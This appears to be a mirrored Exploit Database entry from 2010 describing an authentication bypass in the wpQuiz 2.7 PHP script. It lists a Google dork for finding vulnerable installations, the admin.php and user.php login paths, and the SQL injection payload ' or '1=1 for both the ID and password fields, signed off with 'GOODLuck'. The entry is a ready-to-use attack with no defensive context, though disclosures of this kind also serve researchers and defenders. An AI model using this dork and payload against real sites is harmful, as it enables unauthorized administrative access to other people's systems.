wpQuiz 2.7 – Authentication Bypass

Exploit Database
10 阅读

作者： KnocKout

日期： 2010-09-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15075/

Powered by wpQuiz - Auth bypass Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[+] Greatz : DaiMon 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~

http://[Victim]/path/admin.php 
 [or user.php]

for bypass() bySQL

ID : ' or '1=1
PW : ' or '1=1

GOODLuck ;)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

last Exploits
wpQuiz 2.7 – Authentication Bypass的更多信息

Hero Framework – users/login ‘Username’ Cross-Site Scripting：
Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)：
Entrepreneur Dating Script 2.0.2 – Authentication Bypass：
UPS Network Management Card 4 – Path Traversal：
PHP Address Book – ‘group’ Cross-Site Scripting：
Schlix CMS 2.2.6-6 – Remote Code Execution (Authenticated)：
Vana CMS – ‘Filename’ Arbitrary File Download：
Zoho ManageEngine ServiceDesk Plus 9.3 – Cross-Site Scripting：